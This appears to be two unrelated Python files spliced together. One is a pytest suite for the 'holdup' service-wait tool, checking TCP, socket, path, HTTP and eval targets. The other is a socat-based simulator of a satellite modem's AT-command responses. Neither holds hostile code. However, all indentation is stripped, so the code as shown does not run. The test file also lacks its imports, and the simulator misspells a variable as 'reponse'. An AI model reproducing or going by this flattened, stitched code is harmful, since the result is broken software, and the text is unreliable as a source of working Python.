@pytest.fixture(params=[[], ['--', 'python', '-c', 'print("success !")']])
def extra(request):
return request.param
def test_normal(testdir, extra):
tcp = socket.socket()
tcp.bind(('127.0.0.1', 0))
tcp.listen(1)
_, port = tcp.getsockname()
t = threading.Thread(target=tcp.accept)
t.start()
uds = socket.socket(socket.AF_UNIX)
if os.path.exists('/tmp/holdup-test.sock'):
os.unlink('/tmp/holdup-test.sock')
with open('/tmp/holdup-test', 'w'):
pass
uds.bind('/tmp/holdup-test.sock')
uds.listen(1)
result = testdir.run(
'holdup',
'-t', '0.5',
'tcp://localhost:%s/' % port,
'path:///tmp/holdup-test',
'unix:///tmp/holdup-test.sock',
*extra
)
if extra:
result.stdout.fnmatch_lines(['success !'])
assert result.ret == 0
t.join()
@pytest.mark.parametrize('status', [200, 404])
@pytest.mark.parametrize('proto', ['http', 'https'])
def test_http(testdir, extra, status, proto):
result = testdir.run(
'holdup',
'-T', '5',
'-t', '5.1',
'%s://httpbin.org/status/%s' % (proto, status),
*extra
)
if extra:
if status == 200:
result.stdout.fnmatch_lines(['success !'])
else:
result.stderr.fnmatch_lines(['*HTTP Error 404*'])
@pytest.mark.skipif("urlopen_has_ssl_context()")
def test_http_insecure_with_option(testdir):
result = testdir.run(
'holdup',
'-t', '2',
'--insecure',
'https://self-signed.badssl.com/',
)
assert result.ret == 0
@pytest.mark.skipif("urlopen_has_ssl_context()")
def test_http_insecure_with_proto(testdir):
result = testdir.run(
'holdup',
'-t', '2',
'https+insecure://self-signed.badssl.com/',
)
assert result.ret == 0
def test_any(testdir, extra):
tcp = socket.socket()
tcp.bind(('127.0.0.1', 0))
_, port = tcp.getsockname()
uds = socket.socket(socket.AF_UNIX)
if os.path.exists('/tmp/holdup-test.sock'):
os.unlink('/tmp/holdup-test.sock')
uds.bind('/tmp/holdup-test.sock')
uds.listen(1)
result = testdir.run(
'holdup',
'-v',
'-t', '0.5',
'tcp://localhost:%s/,path:///tmp/holdup-test,unix:///tmp/holdup-test.sock' % port,
*extra
)
if extra:
result.stdout.fnmatch_lines([
'holdup: Waiting for 0.5s (0.5s per check, 0.2s sleep between loops) for these services: '
'any(tcp://localhost:*,path:///tmp/holdup-test,unix:///tmp/holdup-test.sock)',
'holdup: Passed check: path:///tmp/holdup-test',
'holdup: Passed check: any(tcp://localhost:*,path:///tmp/holdup-test,unix:///tmp/holdup-test.sock)',
'holdup: Executing: python -c \'print("success !")\'',
'success !'
])
assert result.ret == 0
def test_any_same_proto(testdir, extra):
tcp1 = socket.socket()
tcp1.bind(('127.0.0.1', 0))
_, port1 = tcp1.getsockname()
tcp2 = socket.socket()
tcp2.bind(('127.0.0.1', 0))
tcp2.listen(1)
_, port2 = tcp2.getsockname()
t = threading.Thread(target=tcp2.accept)
t.start()
result = testdir.run(
'holdup',
'-t', '0.5',
'tcp://localhost:%s,localhost:%s/' % (port1, port2),
*extra
)
if extra:
result.stdout.fnmatch_lines(['success !'])
assert result.ret == 0
t.join()
def test_any_failed(testdir):
tcp = socket.socket()
tcp.bind(('127.0.0.1', 0))
_, port = tcp.getsockname()
result = testdir.run(
'holdup',
'-t', '0.5',
'tcp://localhost:%s/,path:///doesnt/exist,unix:///doesnt/exist' % port,
)
result.stderr.fnmatch_lines([
'holdup: Failed service checks: any(tcp://localhost:%s,path:///doesnt/exist,unix:///doesnt/exist) '
'(Nothing succeeded: '
'tcp://localhost:%s (*), '
'path:///doesnt/exist (*), '
'unix:///doesnt/exist (*). Aborting!' % (port, port)
])
def test_no_abort(testdir, extra):
result = testdir.run(
'holdup',
'-t', '0.1',
'-n',
'tcp://localhost:0',
'tcp://localhost:0/',
'path:///doesnt/exist',
'unix:///doesnt/exist',
*extra
)
result.stderr.fnmatch_lines([
'holdup: Failed checks: tcp://localhost:0 (*), '
'path:///doesnt/exist (*), unix:///doesnt/exist (*)'
])
@pytest.mark.skipif(os.path.exists('/.dockerenv'), reason="chmod(0) does not work in docker")
def test_not_readable(testdir, extra):
foobar = testdir.maketxtfile(foobar='')
foobar.chmod(0)
result = testdir.run(
'holdup',
'-t', '0.1',
'-n',
'path://%s' % foobar,
*extra
)
result.stderr.fnmatch_lines(["holdup: Failed checks: path://%s (Failed access('%s', 'R_OK') test.)" % (foobar, foobar)])
def test_bad_timeout(testdir):
result = testdir.run(
'holdup',
'-t', '0.1',
'-T', '2',
'path:///'
)
result.stderr.fnmatch_lines([
'*error: --timeout value must be greater than --check-timeout value!'
])
def test_eval_bad_import(testdir):
result = testdir.run(
'holdup',
'eval://foobar123.foo()'
)
result.stderr.fnmatch_lines([
"*error: argument service: Invalid service spec 'foobar123.foo()'. Import error: No module named*"
])
def test_eval_bad_expr(testdir):
result = testdir.run(
'holdup',
'eval://foobar123.foo(.)'
)
result.stderr.fnmatch_lines([
"*error: argument service: Invalid service spec 'foobar123.foo(.)'. Parse error:",
' foobar123.foo(.)',
'* ^',
'invalid syntax (<unknown>, line 1)',
])
def test_eval_bad_pg(testdir):
pytest.importorskip('psycopg2')
result = testdir.run(
'holdup',
'-t', '0.1',
'eval://psycopg2.connect("dbname=foo host=0.0.0.0")'
)
result.stderr.fnmatch_lines([
'holdup: Failed service checks: eval://psycopg2.connect* (*'
])
def test_eval_falsey(testdir):
result = testdir.run(
'holdup',
'-t', '0',
'eval://None'
)
result.stderr.fnmatch_lines([
"holdup: Failed service checks: eval://None (Failed to evaluate 'None'. Result None is falsey.). Aborting!"
])
assert result.ret == 1
def test_eval_distutils(testdir, extra):
result = testdir.run(
'holdup',
'eval://distutils.spawn.find_executable("find")',
*extra
)
if extra:
result.stdout.fnmatch_lines(['success !'])
assert result.ret == 0
def test_eval_comma(testdir, extra):
result = testdir.run(
'holdup',
'eval://os.path.join("foo", "bar")',
*extra
)
if extra:
result.stdout.fnmatch_lines(['success !'])
assert result.ret == 0
def test_eval_comma_anycheck(testdir, extra):
result = testdir.run(
'holdup',
'path://whatever123,eval://os.path.join("foo", "bar")',
*extra
)
if extra:
result.stdout.fnmatch_lines(['success !'])
assert result.ret == 0
|
socat_idp_sim.py | #!/usr/bin/env python
import threading
import subprocess
import serial
import time
import binascii
import base64
def socat(dte='./simdte', dce='./simdce'):
'''
Start a socat proxy for a given source to a given target
'''
cmd = 'socat -d -d -v pty,rawer,echo=0,link={} pty,rawer,echo=0,link={}'.format(
dte, dce)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
#(output, err) = p.communicate()
# print(output) if not err else print(err)
def simulate(dte_name='./simdte', dce_name='./simdce'):
try:
socat_thread = threading.Thread(
target=socat, args=(dte_name, dce_name), daemon=True)
socat_thread.start()
time.sleep(1)
dce = serial.Serial(port=dce_name, baudrate=9600)
terminate = False
def dce_write(data, delay=0):
time.sleep(delay)
dce.write(data.encode())
mt_message_queue = []
mo_message_queue = []
ok_responses = ['AT', 'ATZ', 'AT&W']
while dce.isOpen() and not terminate:
if dce.inWaiting() > 0:
rx_data = dce.read(dce.inWaiting()).decode().strip()
print('Received: {}'.format(rx_data))
if rx_data == 'QUIT':
terminate = True
elif rx_data in ok_responses:
dce_write('\r\nOK\r\n')
elif rx_data == 'AT&V':
delay = 2
response = '\r\nACTIVE CONFIGURATION:' \
'\r\nE1 Q0 V1 CRC=0' \
'\r\nS0:000 S3:013 S4:010 S5:008 S6:000 S7:000 S8:000 S10:000 ' \
'S31:00080 S32:00025 S33:000 S34:007 S35:000 S36:00000 S37:00200 ' \
'S38:001 S40:000 S41:00180 S42:65535 S50:000 S52:02500 S53:000 ' \
'S60:001 S61:000 S62:001 S63:000 S64:042 S88:00000 S90:000 S91:000 ' \
'\r\n\r\nOK\r\n'
dce_write(response, delay)
elif rx_data == 'AT+GSN;+GMR':
response = '\r\n+GSN: 00000000MFREE3D\r\n\r\n+GMR: 3.003,3.1,8\r\n' \
'\r\nOK\r\n'
dce_write(response)
elif rx_data == 'ATS39? S41? S51? S55? S56? S57?':
response = '\r\n010\r\n\r\n00180\r\n\r\n000\r\n' \
'\r\n000\r\n\r\n000\r\n\r\n009\r\n' \
'\r\nOK\r\n'
dce_write(response)
elif rx_data == 'ATS90=3 S91=1 S92=1 S122? S116?':
# TODO: model different progressions from unregistered
response = '\r\n0000000010\r\n\r\n0000004093\r\n\r\nOK\r\n'
dce_write(response)
elif rx_data == 'AT%MGFN':
# TODO: model none, one, some
response = '\r\n%MGFN: "FM22.03",22.3,0,255,2,2,2\r\n' \
'"FM23.03",23.3,0,255,2,2,2\r\n' \
'"FM24.03",24.3,0,255,2,2,2\r\n' \
'"FM25.03",25.3,0,255,2,2,2\r\n' \
'"FM26.03",26.3,0,255,2,2,2\r\n' \
'"FM27.03",27.3,0,255,2,2,2\r\n' \
'"FM26.04",26.4,0,255,2,2,2\r\n' \
'\r\nOK\r\n'
dce_write(response)
elif 'AT%MGFG=' in rx_data:
msg_name, data_format = (rx_data.split('=')[1]).split(',')
# data_type = int(data_type)
msg_name = msg_name.replace('"', '')
if msg_name in mt_message_queue and data_format in ['1', '2', '3']:
major, minor = msg_name.replace('FM', '').split('.')
msg_num = '.'.join([major, str(int(minor))])
msg_sin = 255
msg_min = 255
payload = b'Hello World'
data_bytes = bytearray(
[msg_sin, msg_min]) + bytearray(payload)
priority = '0'
state = '2'
length = len(data_bytes)
if data_format == '1':
msg_data = '\"{}\"'.format(data_bytes.decode())
elif data_format == '2':
msg_data = binascii.hexlify(data_bytes)
else:
msg_data = base64.b64encode(data_bytes)
response = '\r\nAT%MGFG: \"{}\",{},{},{},{},{},{},{}' \
'\r\nOK\r\n'.format(msg_name, msg_num, priority,
msg_sin, state, length, data_format, msg_data)
else:
response = '\r\nERROR\r\n'
# TODO: set "last error S register"
dce_write(response)
elif 'AT%MGFM=' in rx_data:
msg_name = rx_data.split('=')[1].replace('"', '')
if msg_name in mt_message_queue:
response = '\r\nOK\r\n'
else:
response = '\r\nERROR\r\n'
dce_write(response)
elif 'AT%MGRT=' in rx_data:
msg_name, priority, sin_min, data_format, data = rx_data[6:].split(
',')
mo_message_queue.append(msg_name)
response = '\r\nOK\r\n'
dce_write(response)
elif 'AT%MGRS' in rx_data:
# TODO: MGRS= is for single or without = means 'all'
# ormat(msg_name, msg_num, priority, sin, state, length, bytesPktd)
response = '%MGRS: '
msg_name = None
if '=' in rx_data:
msg_name = rx_data.split('=')[1].replace('"', '')
if msg_name is not None:
response += '\"{}\",0,0,255,2,2,2\r\n'.format(msg_name)
else:
for msg_name in mo_message_queue:
reponse += '\"{}\",0,0,255,2,2,2\r\n'.format(
msg_name)
response += '\r\nOK\r\n'
dce_write(response)
elif 'AT%GPS=' in rx_data:
example_response = '\r\n%GPS: $GNRMC,221511.000,A,4517.1073,N,07550.9222,W,0.07,0.00,150320,,,A,V*10\r\n' \
'$GNGGA,221511.000,4517.1073,N,07550.9222,W,1,08,1.3,135.0,M,-34.3,M,,0000*7E\r\n' \
'$GNGSA,A,3,28,17,30,11,19,07,,,,,,,2.5,1.3,2.1,1*37\r\n' \
'$GNGSA,A,3,87,81,,,,,,,,,,,2.5,1.3,2.1,2*32\r\n' \
'$GPGSV,2,1,08,01,,,42,07,18,181,35,11,32,056,29,17,48,265,35,0*5D\r\n' \
'$GPGSV,2,2,08,19,24,256,37,28,71,317,30,30,42,209,45,51,29,221,40,0*69\r\n' \
'$GLGSV,1,1,04,81,22,232,36,86,00,044,,87,57,030,42,,,,37,0*40\r\n' \
'\r\nOK\r\n'
example_nofix = '\r\n%GPS: $GNRMC,014131.000,V,,,,,,,160320,,,N,V*29' \
'\r\n$GNGGA,014131.000,,,,,0,06,2.2,,,,,,0000*48' \
'\r\n$GNGSA,A,1,19,17,28,,,,,,,,,,4.5,2.2,3.9,1*3C\r\n' \
'$GNGSA,A,1,81,80,79,,,,,,,,,,4.5,2.2,3.9,2*34\r\n' \
'$GPGSV,2,1,08,02,50,263,35,06,,,38,12,,,38,17,47,104,38,0*66\r\n' \
'$GPGSV,2,2,08,19,68,088,30,28,11,164,41,46,33,210,37,51,29,221,40,0*6B\r\n' \
'$GLGSV,1,1,03,79,19,217,47,80,36,276,35,81,53,050,36,0*4C\r\n' \
'\r\nOK\r\n'
response = '%GPS: '
parts = rx_data.split(',')
for part in parts:
if part == 'GGA':
response += '\r\n' if response != '%GPS: ' else ''
response += '$GNGGA,221511.000,4517.1073,N,07550.9222,W,1,08,1.3,135.0,M,-34.3,M,,0000*7E\r\n'
elif part == 'RMC':
response += '\r\n' if response != '%GPS: ' else ''
response += '$GNRMC,221511.000,A,4517.1073,N,07550.9222,W,0.07,0.00,150320,,,A,V*10\r\n'
elif part == 'GSA':
response += '\r\n' if response != '%GPS: ' else ''
response += '$GNGSA,A,3,28,17,30,11,19,07,,,,,,,2.5,1.3,2.1,1*37\r\n' \
'$GNGSA,A,3,87,81,,,,,,,,,,,2.5,1.3,2.1,2*32\r\n'
elif part == 'GSV':
response += '\r\n' if response != '%GPS: ' else ''
response += '$GPGSV,2,1,08,01,,,42,07,18,181,35,11,32,056,29,17,48,265,35,0*5D\r\n' \
'$GPGSV,2,2,08,19,24,256,37,28,71,317,30,30,42,209,45,51,29,221,40,0*69\r\n'
response += '\r\nOK\r\n'
dce_write(response, 3)
elif rx_data == 'ATS80?': # last error code
response = '\r\n104\r\n\r\nOK\r\n'
dce_write(response)
else:
# TODO: %CRC, %OFF, %TRK, %UTC
print('WARNING: {} command unsupported'.format(rx_data))
response = '\r\nERROR\r\n'
dce_write(response)
except KeyboardInterrupt:
print('\nKeyboard Interrupt')
except Exception as e:
print(e)
finally:
exit()
def main():
dte_name = './simdte'
dce_name = './simdce'
try:
socat_thread = threading.Thread(
target=socat, args=(dte_name, dce_name), daemon=True)
socat_thread.start()
time.sleep(1)
dte = serial.Serial(port=dte_name, baudrate=9600)
dce = serial.Serial(port=dce_name, baudrate=9600)
cycles = 0
while dte.isOpen() and dce.isOpen():
if dce.inWaiting() > 0:
print('\nRead: {}'.format(dce.read(dce.inWaiting()).decode()))
if cycles == 3:
print('Write:', end=' ')
dte.write('TEST'.encode())
cycles = 0
cycles += 1
time.sleep(1)
except KeyboardInterrupt:
print('Keyboard interrupt')
except Exception as e:
print(e)
finally:
# socat_thread.join()
exit()
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.